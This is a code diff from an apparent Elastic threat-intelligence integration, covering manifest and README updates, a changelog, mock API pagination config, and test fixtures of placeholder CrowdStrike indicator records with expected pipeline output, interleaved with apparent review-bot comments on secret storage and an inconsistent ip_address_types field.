--- a/packages/ti_cif3/manifest.yml
+++ b/packages/ti_cif3/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
name: ti_cif3
title: "Collective Intelligence Framework v3"
-version: "1.10.1"
+version: "1.12.0"
description: "Ingest threat indicators from a Collective Intelligence Framework v3 instance with Elastic Agent."
type: integration
categories:
@@ -9,7 +9,7 @@ categories:
- threat_intel
conditions:
kibana:
- version: "^8.7.1"
+ version: "^8.12.0"
icons:
- src: /img/csg_logo_big.svg
title: csirtgadgets logo
@@ -38,6 +38,7 @@ policy_templates:
required: true
show_user: true
description: The CIFv3 API read token
+ secret: true
owner:
github: elastic/security-service-integrations
type: community
diff --git a/packages/ti_crowdstrike/_dev/build/docs/README.md b/packages/ti_crowdstrike/_dev/build/docs/README.md
index 829b91c95c5..dee7d0b94a0 100644
--- a/packages/ti_crowdstrike/_dev/build/docs/README.md
+++ b/packages/ti_crowdstrike/_dev/build/docs/README.md
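Review bot: The `secret: true` added under the API read token variable cannot be checked against the variable's `type:` here, because the variable's definition starts above the hunk; `secret: true` selects Fleet secret storage for the value, while masking in the policy editor, as far as I can tell, still depends on `type: password`, so the two should be confirmed together. The `kibana.version` bump to `^8.12.0` in the earlier hunk reads as the matching minimum for secret-backed variables, which is consistent with this change. A one-line comment next to the new key would save the next reader the lookup, e.g. `# stored in Fleet secret storage; this is why the Kibana constraint above is ^8.12.0`.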
@@ -46,6 +46,16 @@ This module has been tested against the **CrowdStrike Falcon Intelligence API Ve
2. Client Secret
3. Token url
4. API Endpoint url
+5. Required scopes for each data stream :
+
+ | Data Stream | Scope |
+ | ------------- | ------------- |
+ | Intel | read:intel |
+ | IOC | read:iocs |
+
+Follow the [documentation](https://www.crowdstrike.com/blog/tech-center/consume-ioc-and-threat-feeds/) for enabling the scopes from the CrowdStrike console.
+
+User should either have `admin` role or `Detection Exception Manager` role to access IOCs endpoint. Follow the [documentation](https://falcon.crowdstrike.com/documentation/page/f20650df/default-roles-reference) for managing user roles and permissions.
### Enabling the integration in Elastic:
diff --git a/packages/ti_crowdstrike/_dev/deploy/docker/files/config.yml b/packages/ti_crowdstrike/_dev/deploy/docker/files/config.yml
index 526b7903768..1045d4232e3 100644
--- a/packages/ti_crowdstrike/_dev/deploy/docker/files/config.yml
+++ b/packages/ti_crowdstrike/_dev/deploy/docker/files/config.yml
@@ -16,11 +16,14 @@ rules:
query_params:
offset: 0
limit: 1
+ filter: '{filter:_marker:>"[0-9]+"}'
responses:
- status_code: 200
headers:
Content-Type:
- application/json
+ Next-Page:
+ - /abc?_marker=123
body: |-
{
"meta": {
@@ -123,7 +126,7 @@ rules:
Authorization:
- 'Bearer xxxx'
query_params:
- offset: 1
+ _marker: 123
limit: 1
responses:
- status_code: 200
diff --git a/packages/ti_crowdstrike/changelog.yml b/packages/ti_crowdstrike/changelog.yml
index b4da440bce5..b981df5249f 100644
--- a/packages/ti_crowdstrike/changelog.yml
+++ b/packages/ti_crowdstrike/changelog.yml
@@ -1,4 +1,60 @@
# newer versions go on top
+- version: "0.5.4"
+ changes:
+ - description: Add the ECS mappings to be useful for threat Intel rules.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9456
+- version: "0.5.3"
+ changes:
+ - description: Ensure integer timestamp is rendered as an integer.
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9288
+- version: "0.5.2"
+ changes:
+ - description: Add ilm policy to intel data stream.
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9274
+- version: "0.5.1"
+ changes:
+ - description: Add the mapping of hash sha1 type indicator.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9270
+ - description: Add the offset in the config in case of unsuccessful requests.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9270
+- version: "0.5.0"
+ changes:
+ - description: Set sensitive values as secret, upgrade to package spec 3.0.3.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9238
+- version: "0.4.1"
+ changes:
+ - description: Typecast the cursor value to string and update Readme.
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9225
+- version: "0.4.0"
+ changes:
+ - description: Adding support of Deep Pagination in Intel Data Stream.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9200
+- version: "0.3.1"
+ changes:
+ - description: Adding null checks to processors.
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9156
+- version: "0.3.0"
+ changes:
+ - description: Improve error reporting for unsuccessful API queries.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9059
+- version: "0.2.0"
+ changes:
+ - description: Update Readme.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9013
+ - description: Remove convert processor for the ip_address_type field.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9013
- version: "0.1.2"
changes:
- description: Changed owners
diff --git a/packages/ti_crowdstrike/data_stream/intel/_dev/test/pipeline/test-intel.log b/packages/ti_crowdstrike/data_stream/intel/_dev/test/pipeline/test-intel.log
index 6ca654e5859..cd54031fb0b 100644
--- a/packages/ti_crowdstrike/data_stream/intel/_dev/test/pipeline/test-intel.log
+++ b/packages/ti_crowdstrike/data_stream/intel/_dev/test/pipeline/test-intel.log
@@ -1,3 +1,7 @@
{"id":"hash_sha256_c98e1a7f563824cd448b47613743dcd1c853742b78f42b000192b83d","indicator":"c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d","type":"hash_sha256","deleted":false,"published_date":1700547356,"last_updated":1700547361,"reports":["reports"],"actors":["SALTYSPIDER"],"malware_families":["Mofksys"],"kill_chains":["Installation","C2"],"ip_address_types":["81.2.69.192"],"domain_types":["abc.com"],"malicious_confidence":"high","_marker":"17005473618d17ae6353d123235e4158c5c81f25f0","labels":[{"name":"MaliciousConfidence/High","created_on":1700547356,"last_valid_on":1700547360},{"name":"Malware/Mofksys","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/Commodity","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/CredentialHarvesting","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/InformationStealer","created_on":1700547359,"last_valid_on":1700547359}],"relations":[{"id":"domain.com.yy","indicator":"domain.ds","type":"domain","created_date":1700547339,"last_valid_date":1700547339},{"id":"domain.xx.yy","indicator":"domain.xx.fd","type":"domain","created_date":1700547339,"last_valid_date":1700547339}],"targets":["abc"],"threat_types":["Commodity","CredentialHarvesting","InformationStealer"],"vulnerabilities":["vuln"]}
{"id":"hash_md5_ea09ae9cc6768c50fcee903ed054556e5bfc8347907f12598aa24193","indicator":"d98f192bf91a7f97563824cd448b1c853742b78f42b9990192b83d","type":"hash_md5","deleted":true,"published_date":1700547346,"last_updated":1700547461,"reports":["reports"],"actors":["SALTYSPIDER"],"malware_families":["Trojan"],"kill_chains":["Installation","C2"],"ip_address_types":["81.2.69.192"],"domain_types":["domain.com"],"malicious_confidence":"low","_marker":"1800547361df353d123235e4158c5c81f25f0","labels":[{"name":"MaliciousConfidence/High","created_on":1700547390,"last_valid_on":1700547390},{"name":"Malware/Mofksys","created_on":1700547369,"last_valid_on":1700547369},{"name":"ThreatType/Commodity","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/CredentialHarvesting","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/InformationStealer","created_on":1700547359,"last_valid_on":1700547359}],"relations":[{"id":"domain.com.xx","indicator":"domain.xx","type":"domain","created_date":1700547339,"last_valid_date":1700547339},{"id":"domain.xx.yy","indicator":"domain.xx.fd","type":"domain","created_date":1700547339,"last_valid_date":1700547339}],"targets":["abc"],"threat_types":["Commodity","CredentialHarvesting","InformationStealer"],"vulnerabilities":["vuln"]} 
-{"id":"domain_ea09ae9cc6768c50fcee903ed054556e5bfc8347907f12598aa24193","indicator":"e88808f192bf563824cd448b1c853742b78f42b9990192b83d","type":"domain","deleted":true,"published_date":1700547346,"last_updated":1700547469,"reports":["reports"],"actors":["SALTYSPIDER"],"malware_families":["Trojan"],"kill_chains":["Installation","C2"],"ip_address_types":["81.2.69.192"],"domain_types":["domain.com"],"malicious_confidence":"low","_marker":"1800547361df353d123235e4158c5c81f25f0","labels":[{"name":"MaliciousConfidence/High","created_on":1700547390,"last_valid_on":1700547390},{"name":"Malware/Mofksys","created_on":1700547369,"last_valid_on":1700547369},{"name":"ThreatType/Commodity","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/CredentialHarvesting","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/InformationStealer","created_on":1700547359,"last_valid_on":1700547359}],"relations":[{"id":"domain.com.xx","indicator":"domain.xx","type":"domain","created_date":1700547339,"last_valid_date":1700547339},{"id":"domain.xx.yy","indicator":"domain.xx.fd","type":"domain","created_date":1700547339,"last_valid_date":1700547339}],"targets":["abc"],"threat_types":["Commodity","CredentialHarvesting","InformationStealer"],"vulnerabilities":["vuln"]} 
+{"id":"domain_ea09ae9cc6768c50fcee903ed054556e5bfc8347907f12598aa24193","indicator":"e88808f192bf563824cd448b1c853742b78f42b9990192b83d","type":"domain","deleted":true,"published_date":1700547346,"last_updated":1700547469,"reports":["reports"],"actors":["SALTYSPIDER"],"malware_families":["Trojan"],"kill_chains":["Installation","C2"],"ip_address_types":["C2"],"domain_types":["domain.com"],"malicious_confidence":"low","_marker":"1800547361df353d123235e4158c5c81f25f0","labels":[{"name":"MaliciousConfidence/High","created_on":1700547390,"last_valid_on":1700547390},{"name":"Malware/Mofksys","created_on":1700547369,"last_valid_on":1700547369},{"name":"ThreatType/Commodity","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/CredentialHarvesting","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/InformationStealer","created_on":1700547359,"last_valid_on":1700547359}],"relations":[{"id":"domain.com.xx","indicator":"domain.xx","type":"domain","created_date":1700547339,"last_valid_date":1700547339},{"id":"domain.xx.yy","indicator":"domain.xx.fd","type":"domain","created_date":1700547339,"last_valid_date":1700547339}],"targets":["abc"],"threat_types":["Commodity","CredentialHarvesting","InformationStealer"],"vulnerabilities":["vuln"]} 
+{"_marker":"17005473618d17ae6353d123235e4158c5c81f25f0","actors":[],"deleted":false,"domain_types":[],"id":"hash_md5_ea09ae9cc6768c50fcee903ed054556e5bfc8347907f12598aa24193","indicator":"e52faef955f651da029a4ee4fa227c0f","ip_address_types":[],"kill_chains":[],"labels":[{"created_on":1707938343,"last_valid_on":1707938355,"name":"MaliciousConfidence/High"},{"created_on":1707938347,"last_valid_on":1707938347,"name":"Malware/STOP"},{"created_on":1707938347,"last_valid_on":1707938347,"name":"ThreatType/Criminal"},{"created_on":1707938347,"last_valid_on":1707938347,"name":"ThreatType/Ransomware"}],"last_updated":1707938355,"malicious_confidence":"high","malware_families":["STOP"],"published_date":1707938343,"relations":[],"reports":[],"targets":[],"threat_types":["Criminal","Ransomware"],"type":"hash_md5","vulnerabilities":[]}
+{"id":"hash_sha1_abcdxxxxxx","indicator":"t98f1xxxxxxxxxxxxxxc853742b78f42b9990192b83d","type":"hash_sha1","deleted":true,"published_date":1700547349,"last_updated":1700547471,"reports":["reports"],"actors":["SALTYSPIDER"],"malware_families":["Trojan"],"kill_chains":["Installation","C2"],"ip_address_types":["81.2.69.192"],"domain_types":["domain.com"],"malicious_confidence":"low","_marker":"1000547361df353d123235e4158c5c81f456f0","labels":[{"name":"MaliciousConfidence/High","created_on":1700547390,"last_valid_on":1700547390},{"name":"Malware/Mofksys","created_on":1700547369,"last_valid_on":1700547369},{"name":"ThreatType/Commodity","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/CredentialHarvesting","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/InformationStealer","created_on":1700547359,"last_valid_on":1700547359}],"relations":[{"id":"domain.com.xx","indicator":"domain.xx","type":"domain","created_date":1700547339,"last_valid_date":1700547339},{"id":"domain.xx.yy","indicator":"domain.xx.fd","type":"domain","created_date":1700547339,"last_valid_date":1700547339}],"targets":["abc"],"threat_types":
["Commodity","CredentialHarvesting","InformationStealer"],"vulnerabilities":["vuln"]}
+{"id":"url_dddxxx","indicator":"www.example.com","type":"url","deleted":false,"published_date":1700547349,"last_updated":1700547481,"reports":["reports"],"actors":["SALTYSPIDER"],"malware_families":["Trojan"],"kill_chains":["Installation","C2"],"ip_address_types":["81.2.69.192"],"domain_types":["abc.com"],"malicious_confidence":"medium","_marker":"1000547361df3d123235e4158c5c81f456f0","labels":[{"name":"MaliciousConfidence/High","created_on":1700547391,"last_valid_on":1700547391},{"name":"Malware/Mofksys","created_on":1700547369,"last_valid_on":1700547369},{"name":"ThreatType/Commodity","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/CredentialHarvesting","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/InformationStealer","created_on":1700547359,"last_valid_on":1700547359}],"relations":[{"id":"domain.com.xx","indicator":"domain.xx","type":"domain","created_date":1700547339,"last_valid_date":1700547339},{"id":"domain.xx.yy","indicator":"domain.xx.fd","type":"domain","created_date":1700547339,"last_valid_date":1700547339}],"targets":["abc"],"threat_types":["Commodity","CredentialHarvesting","InformationStealer"],"vulnerabilities":["vuln"]}
+{"id":"ip_address_123xxxx","indicator":"81.2.69.192","type":"ip_address","deleted":true,"published_date":1700547349,"last_updated":1700547491,"reports":["reports"],"actors":["SALTYSPIDER"],"malware_families":["Trojan"],"kill_chains":["Installation","C2"],"ip_address_types":["81.2.69.192"],"domain_types":["domain.com"],"malicious_confidence":"low","_marker":"10005df353d123235e4158c5c81f456f0","labels":[{"name":"MaliciousConfidence/High","created_on":1700547395,"last_valid_on":1700547396},{"name":"Malware/Mofksys","created_on":1700547369,"last_valid_on":1700547369},{"name":"ThreatType/Commodity","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/CredentialHarvesting","created_on":1700547359,"last_valid_on":1700547359},{"name":"ThreatType/InformationStealer","created_on":1700547359,"last_valid_on":1700547359}],"relations":[{"id":"domain.com.xx","indicator":"domain.xx","type":"domain","created_date":1700547339,"last_valid_date":1700547339},{"id":"domain.xx.yy","indicator":"domain.xx.fd","type":"domain","created_date":1700547339,"last_valid_date":1700547339}],"targets":["abc"],"threat_types":["Commodity","CredentialHarvesting","InformationStealer"]}
diff --git a/packages/ti_crowdstrike/data_stream/intel/_dev/test/pipeline/test-intel.log-expected.json b/packages/ti_crowdstrike/data_stream/intel/_dev/test/pipeline/test-intel.log-expected.json
index 021846ff896..c19e8fb4afd 100644
--- a/packages/ti_crowdstrike/data_stream/intel/_dev/test/pipeline/test-intel.log-expected.json
+++ b/packages/ti_crowdstrike/data_stream/intel/_dev/test/pipeline/test-intel.log-expected.json
@@ -16,11 +16,6 @@ "indicator" ] }, - "file": { - "hash": { - "sha256": "c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d" - } - }, "related": { "hash": [ "c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d"
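Review bot: The fixture now disagrees with itself about what `ip_address_types` holds: the rewritten domain record sets it to `["C2"]`, a type label, and its expected output in the next file accordingly loses `related.ip`, yet three of the four newly added records keep `"ip_address_types":["81.2.69.192"]`, and the expected output for the sha1 and url records still derives `related.ip` from it. If the field is a label in the real API, as the domain record suggests, then the pipeline's `related.ip` enrichment from this field produces IP-looking values with no indicator semantics, which downstream indicator-match rules may consume, and the new records are masking that rather than testing it. I would give the added records label values as well, e.g. `"ip_address_types":["C2"]`, and confirm the pipeline only feeds `related.ip` from `indicator` when `type` is `ip_address`. The pipeline itself and the remaining expected-output hunks are outside this chunk, so I cannot verify which side is intended.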
@@ -36,6 +31,11 @@ "threat": { "indicator": { "confidence": "High", + "file": { + "hash": { + "sha256": "c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d" + } + }, "name": "c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d", "provider": "crowdstrike", "type": "file" @@ -148,11 +148,6 @@ "indicator" ] }, - "file": { - "hash": { - "md5": "d98f192bf91a7f97563824cd448b1c853742b78f42b9990192b83d" - } - }, "related": { "hash": [ "d98f192bf91a7f97563824cd448b1c853742b78f42b9990192b83d" @@ -168,6 +163,11 @@ "threat": { "indicator": { "confidence": "Low", + "file": { + "hash": { + "md5": "d98f192bf91a7f97563824cd448b1c853742b78f42b9990192b83d" + } + }, "name": "d98f192bf91a7f97563824cd448b1c853742b78f42b9990192b83d", "provider": "crowdstrike", "type": "file" 
@@ -275,16 +275,11 @@ ], "id": "domain_ea09ae9cc6768c50fcee903ed054556e5bfc8347907f12598aa24193", "kind": "enrichment", - "original": "{\"id\":\"domain_ea09ae9cc6768c50fcee903ed054556e5bfc8347907f12598aa24193\",\"indicator\":\"e88808f192bf563824cd448b1c853742b78f42b9990192b83d\",\"type\":\"domain\",\"deleted\":true,\"published_date\":1700547346,\"last_updated\":1700547469,\"reports\":[\"reports\"],\"actors\":[\"SALTYSPIDER\"],\"malware_families\":[\"Trojan\"],\"kill_chains\":[\"Installation\",\"C2\"],\"ip_address_types\":[\"81.2.69.192\"],\"domain_types\":[\"domain.com\"],\"malicious_confidence\":\"low\",\"_marker\":\"1800547361df353d123235e4158c5c81f25f0\",\"labels\":[{\"name\":\"MaliciousConfidence/High\",\"created_on\":1700547390,\"last_valid_on\":1700547390},{\"name\":\"Malware/Mofksys\",\"created_on\":1700547369,\"last_valid_on\":1700547369},{\"name\":\"ThreatType/Commodity\",\"created_on\":1700547359,\"last_valid_on\":1700547359},{\"name\":\"ThreatType/CredentialHarvesting\",\"created_on\":1700547359,\"last_valid_on\":1700547359},{\"name\":\"ThreatType/InformationStealer\",\"created_on\":1700547359,\"last_valid_on\":1700547359}],\"relations\":[{\"id\":\"domain.com.xx\",\"indicator\":\"domain.xx\",\"type\":\"domain\",\"created_date\":1700547339,\"last_valid_date\":1700547339},{\"id\":\"domain.xx.yy\",\"indicator\":\"domain.xx.fd\",\"type\":\"domain\",\"created_date\":1700547339,\"last_valid_date\":1700547339}],\"targets\":[\"abc\"],\"threat_types\":[\"Commodity\",\"CredentialHarvesting\",\"InformationStealer\"],\"vulnerabilities\":[\"vuln\"]}", + "original": 
"{\"id\":\"domain_ea09ae9cc6768c50fcee903ed054556e5bfc8347907f12598aa24193\",\"indicator\":\"e88808f192bf563824cd448b1c853742b78f42b9990192b83d\",\"type\":\"domain\",\"deleted\":true,\"published_date\":1700547346,\"last_updated\":1700547469,\"reports\":[\"reports\"],\"actors\":[\"SALTYSPIDER\"],\"malware_families\":[\"Trojan\"],\"kill_chains\":[\"Installation\",\"C2\"],\"ip_address_types\":[\"C2\"],\"domain_types\":[\"domain.com\"],\"malicious_confidence\":\"low\",\"_marker\":\"1800547361df353d123235e4158c5c81f25f0\",\"labels\":[{\"name\":\"MaliciousConfidence/High\",\"created_on\":1700547390,\"last_valid_on\":1700547390},{\"name\":\"Malware/Mofksys\",\"created_on\":1700547369,\"last_valid_on\":1700547369},{\"name\":\"ThreatType/Commodity\",\"created_on\":1700547359,\"last_valid_on\":1700547359},{\"name\":\"ThreatType/CredentialHarvesting\",\"created_on\":1700547359,\"last_valid_on\":1700547359},{\"name\":\"ThreatType/InformationStealer\",\"created_on\":1700547359,\"last_valid_on\":1700547359}],\"relations\":[{\"id\":\"domain.com.xx\",\"indicator\":\"domain.xx\",\"type\":\"domain\",\"created_date\":1700547339,\"last_valid_date\":1700547339},{\"id\":\"domain.xx.yy\",\"indicator\":\"domain.xx.fd\",\"type\":\"domain\",\"created_date\":1700547339,\"last_valid_date\":1700547339}],\"targets\":[\"abc\"],\"threat_types\":[\"Commodity\",\"CredentialHarvesting\",\"InformationStealer\"],\"vulnerabilities\":[\"vuln\"]}", "type": [ "indicator" ] }, - "related": { - "ip": [ - "81.2.69.192" - ] - }, "tags": [ "preserve_original_event", "preserve_duplicate_custom_fields" @@ -309,7 +304,7 @@ ], "id": "domain_ea09ae9cc6768c50fcee903ed054556e5bfc8347907f12598aa24193", "ip_address_types": [ - "81.2.69.192" + "C2" ], "kill_chains": [ "Installation", 
@@ -387,6 +382,467 @@ "vuln" ] } + }, + { + "@timestamp": "2024-02-14T19:19:15.000Z", + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "threat" + ], + "id": "hash_md5_ea09ae9cc6768c50fcee903ed054556e5bfc8347907f12598aa24193", + "kind": "enrichment", + "original": "{\"_marker\":\"17005473618d17ae6353d123235e4158c5c81f25f0\",\"actors\":[],\"deleted\":false,\"domain_types\":[],\"id\":\"hash_md5_ea09ae9cc6768c50fcee903ed054556e5bfc8347907f12598aa24193\",\"indicator\":\"e52faef955f651da029a4ee4fa227c0f\",\"ip_address_types\":[],\"kill_chains\":[],\"labels\":[{\"created_on\":1707938343,\"last_valid_on\":1707938355,\"name\":\"MaliciousConfidence/High\"},{\"created_on\":1707938347,\"last_valid_on\":1707938347,\"name\":\"Malware/STOP\"},{\"created_on\":1707938347,\"last_valid_on\":1707938347,\"name\":\"ThreatType/Criminal\"},{\"created_on\":1707938347,\"last_valid_on\":1707938347,\"name\":\"ThreatType/Ransomware\"}],\"last_updated\":1707938355,\"malicious_confidence\":\"high\",\"malware_families\":[\"STOP\"],\"published_date\":1707938343,\"relations\":[],\"reports\":[],\"targets\":[],\"threat_types\":[\"Criminal\",\"Ransomware\"],\"type\":\"hash_md5\",\"vulnerabilities\":[]}", + "type": [ + "indicator" + ] + }, + "related": { + "hash": [ + "e52faef955f651da029a4ee4fa227c0f" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "e52faef955f651da029a4ee4fa227c0f" + } + }, + "name": "e52faef955f651da029a4ee4fa227c0f", + "provider": "crowdstrike", + "type": "file" + } + }, + "ti_crowdstrike": { + "intel": { + "_marker": "17005473618d17ae6353d123235e4158c5c81f25f0", + "deleted": false, + "id": "hash_md5_ea09ae9cc6768c50fcee903ed054556e5bfc8347907f12598aa24193", + "labels": [ + { + "created_on": "2024-02-14T19:19:03.000Z", + "last_valid_on": "2024-02-14T19:19:15.000Z", + "name": "MaliciousConfidence/High" + }, + { + "created_on": 
"2024-02-14T19:19:07.000Z", + "last_valid_on": "2024-02-14T19:19:07.000Z", + "name": "Malware/STOP" + }, + { + "created_on": "2024-02-14T19:19:07.000Z", + "last_valid_on": "2024-02-14T19:19:07.000Z", + "name": "ThreatType/Criminal" + }, + { + "created_on": "2024-02-14T19:19:07.000Z", + "last_valid_on": "2024-02-14T19:19:07.000Z", + "name": "ThreatType/Ransomware" + } + ], + "last_updated": "2024-02-14T19:19:15.000Z", + "malicious_confidence": "high", + "malware_families": [ + "STOP" + ], + "published_date": "2024-02-14T19:19:03.000Z", + "threat_types": [ + "Criminal", + "Ransomware" + ], + "type": "hash_md5", + "value": "e52faef955f651da029a4ee4fa227c0f" + } + } + }, + { + "@timestamp": "2023-11-21T06:17:51.000Z", + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "threat" + ], + "id": "hash_sha1_abcdxxxxxx", + "kind": "enrichment", + "original": "{\"id\":\"hash_sha1_abcdxxxxxx\",\"indicator\":\"t98f1xxxxxxxxxxxxxxc853742b78f42b9990192b83d\",\"type\":\"hash_sha1\",\"deleted\":true,\"published_date\":1700547349,\"last_updated\":1700547471,\"reports\":[\"reports\"],\"actors\":[\"SALTYSPIDER\"],\"malware_families\":[\"Trojan\"],\"kill_chains\":[\"Installation\",\"C2\"],\"ip_address_types\":[\"81.2.69.192\"],\"domain_types\":[\"domain.com\"],\"malicious_confidence\":\"low\",\"_marker\":\"1000547361df353d123235e4158c5c81f456f0\",\"labels\":[{\"name\":\"MaliciousConfidence/High\",\"created_on\":1700547390,\"last_valid_on\":1700547390},{\"name\":\"Malware/Mofksys\",\"created_on\":1700547369,\"last_valid_on\":1700547369},{\"name\":\"ThreatType/Commodity\",\"created_on\":1700547359,\"last_valid_on\":1700547359},{\"name\":\"ThreatType/CredentialHarvesting\",\"created_on\":1700547359,\"last_valid_on\":1700547359},{\"name\":\"ThreatType/InformationStealer\",\"created_on\":1700547359,\"last_valid_on\":1700547359}],\"relations\":[{\"id\":\"domain.com.xx\",\"indicator\":\"domain.xx\",\"type\":\"domain\",\"created_date\":1700547339,\"last_valid_date\":1700547339},
{\"id\":\"domain.xx.yy\",\"indicator\":\"domain.xx.fd\",\"type\":\"domain\",\"created_date\":1700547339,\"last_valid_date\":1700547339}],\"targets\":[\"abc\"],\"threat_types\":[\"Commodity\",\"CredentialHarvesting\",\"InformationStealer\"],\"vulnerabilities\":[\"vuln\"]}", + "type": [ + "indicator" + ] + }, + "related": { + "hash": [ + "t98f1xxxxxxxxxxxxxxc853742b78f42b9990192b83d" + ], + "ip": [ + "81.2.69.192" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "confidence": "Low", + "file": { + "hash": { + "sha1": "t98f1xxxxxxxxxxxxxxc853742b78f42b9990192b83d" + } + }, + "name": "t98f1xxxxxxxxxxxxxxc853742b78f42b9990192b83d", + "provider": "crowdstrike", + "type": "file" + } + }, + "ti_crowdstrike": { + "intel": { + "_marker": "1000547361df353d123235e4158c5c81f456f0", + "actors": [ + "SALTYSPIDER" + ], + "deleted": true, + "domain_types": [ + "domain.com" + ], + "id": "hash_sha1_abcdxxxxxx", + "ip_address_types": [ + "81.2.69.192" + ], + "kill_chains": [ + "Installation", + "C2" + ], + "labels": [ + { + "created_on": "2023-11-21T06:16:30.000Z", + "last_valid_on": "2023-11-21T06:16:30.000Z", + "name": "MaliciousConfidence/High" + }, + { + "created_on": "2023-11-21T06:16:09.000Z", + "last_valid_on": "2023-11-21T06:16:09.000Z", + "name": "Malware/Mofksys" + }, + { + "created_on": "2023-11-21T06:15:59.000Z", + "last_valid_on": "2023-11-21T06:15:59.000Z", + "name": "ThreatType/Commodity" + }, + { + "created_on": "2023-11-21T06:15:59.000Z", + "last_valid_on": "2023-11-21T06:15:59.000Z", + "name": "ThreatType/CredentialHarvesting" + }, + { + "created_on": "2023-11-21T06:15:59.000Z", + "last_valid_on": "2023-11-21T06:15:59.000Z", + "name": "ThreatType/InformationStealer" + } + ], + "last_updated": "2023-11-21T06:17:51.000Z", + "malicious_confidence": "low", + "malware_families": [ + "Trojan" + ], + "published_date": "2023-11-21T06:15:49.000Z", + "relations": [ + { + "created_date": 
"2023-11-21T06:15:39.000Z", + "id": "domain.com.xx", + "indicator": "domain.xx", + "last_valid_date": "2023-11-21T06:15:39.000Z", + "type": "domain" + }, + { + "created_date": "2023-11-21T06:15:39.000Z", + "id": "domain.xx.yy", + "indicator": "domain.xx.fd", + "last_valid_date": "2023-11-21T06:15:39.000Z", + "type": "domain" + } + ], + "reports": [ + "reports" + ], + "targets": [ + "abc" + ], + "threat_types": [ + "Commodity", + "CredentialHarvesting", + "InformationStealer" + ], + "type": "hash_sha1", + "value": "t98f1xxxxxxxxxxxxxxc853742b78f42b9990192b83d", + "vulnerabilities": [ + "vuln" + ] + } + }, + "vulnerability": { + "category": [ + "vuln" + ] + } + }, + { + "@timestamp": "2023-11-21T06:18:01.000Z", + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "threat" + ], + "id": "url_dddxxx", + "kind": "enrichment", + "original": "{\"id\":\"url_dddxxx\",\"indicator\":\"www.example.com\",\"type\":\"url\",\"deleted\":false,\"published_date\":1700547349,\"last_updated\":1700547481,\"reports\":[\"reports\"],\"actors\":[\"SALTYSPIDER\"],\"malware_families\":[\"Trojan\"],\"kill_chains\":[\"Installation\",\"C2\"],\"ip_address_types\":[\"81.2.69.192\"],\"domain_types\":[\"abc.com\"],\"malicious_confidence\":\"medium\",\"_marker\":\"1000547361df3d123235e4158c5c81f456f0\",\"labels\":[{\"name\":\"MaliciousConfidence/High\",\"created_on\":1700547391,\"last_valid_on\":1700547391},{\"name\":\"Malware/Mofksys\",\"created_on\":1700547369,\"last_valid_on\":1700547369},{\"name\":\"ThreatType/Commodity\",\"created_on\":1700547359,\"last_valid_on\":1700547359},{\"name\":\"ThreatType/CredentialHarvesting\",\"created_on\":1700547359,\"last_valid_on\":1700547359},{\"name\":\"ThreatType/InformationStealer\",\"created_on\":1700547359,\"last_valid_on\":1700547359}],\"relations\":[{\"id\":\"domain.com.xx\",\"indicator\":\"domain.xx\",\"type\":\"domain\",\"created_date\":1700547339,\"last_valid_date\":1700547339},{\"id\":\"domain.xx.yy\",\"indicator\":\"domain.xx.fd\",\"typ
e\":\"domain\",\"created_date\":1700547339,\"last_valid_date\":1700547339}],\"targets\":[\"abc\"],\"threat_types\":[\"Commodity\",\"CredentialHarvesting\",\"InformationStealer\"],\"vulnerabilities\":[\"vuln\"]}", + "type": [ + "indicator" + ] + }, + "related": { + "ip": [ + "81.2.69.192" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "confidence": "Medium", + "name": "www.example.com", + "provider": "crowdstrike", + "type": "url", + "url": { + "full": "www.example.com" + } + } + }, + "ti_crowdstrike": { + "intel": { + "_marker": "1000547361df3d123235e4158c5c81f456f0", + "actors": [ + "SALTYSPIDER" + ], + "deleted": false, + "domain_types": [ + "abc.com" + ], + "id": "url_dddxxx", + "ip_address_types": [ + "81.2.69.192" + ], + "kill_chains": [ + "Installation", + "C2" + ], + "labels": [ + { + "created_on": "2023-11-21T06:16:31.000Z", + "last_valid_on": "2023-11-21T06:16:31.000Z", + "name": "MaliciousConfidence/High" + }, + { + "created_on": "2023-11-21T06:16:09.000Z", + "last_valid_on": "2023-11-21T06:16:09.000Z", + "name": "Malware/Mofksys" + }, + { + "created_on": "2023-11-21T06:15:59.000Z", + 